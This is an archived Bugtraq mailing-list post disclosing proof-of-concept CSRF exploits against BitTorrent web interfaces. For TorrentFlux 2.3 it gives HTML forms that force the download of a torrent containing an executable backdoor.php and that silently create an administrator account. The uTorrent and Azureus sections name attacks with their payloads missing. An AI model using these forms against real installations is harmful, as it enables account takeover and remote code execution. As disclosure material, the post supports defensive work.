Home page logo

bugtraq logo Bugtraq mailing list archives

BitTorrent Clients and CSRF
From: th3.r00k.nospam () pork gmail com
Date: 18 Apr 2008 08:33:51 -0000

The following are proof of concept exploits against three bittorrent clients.  uTorrent' WebUI, Azurues's "HTML WebUI", 
and TorrentFlux.

More information:

TorrentFlux v2.3(Latest)

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by 
browsing here:
You do not have to know a password to access this folder, but you will have to know the username.
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php";>
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent";>
<input type=submit value='file attack'>

Add an admistrative account:
<form id=’create_admin’ method=”post” action=”http://localhost/torrentflux_2.3/html/admin.php?op=addUser”>
<input type=hidden name=”newUser” value=”sadmin”>
<input type=hidden name=”pass1&#8243; value=”password”>
<input type=hidden name=”pass2&#8243; value=”password”>
<input type=hidden name=”userType” value=1>
<input type=submit value=’create admin’>

uTorrent’s WebUI is also affected:
force file download:

utorrent change administrative login information:
After the username or password have been changed then the browser must re-authenticate.,
So is Azurues’s HTML WebUI:
Force file download:

  By Date           By Thread  

Current thread:
  • BitTorrent Clients and CSRF th3 . r00k . nospam (Apr 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]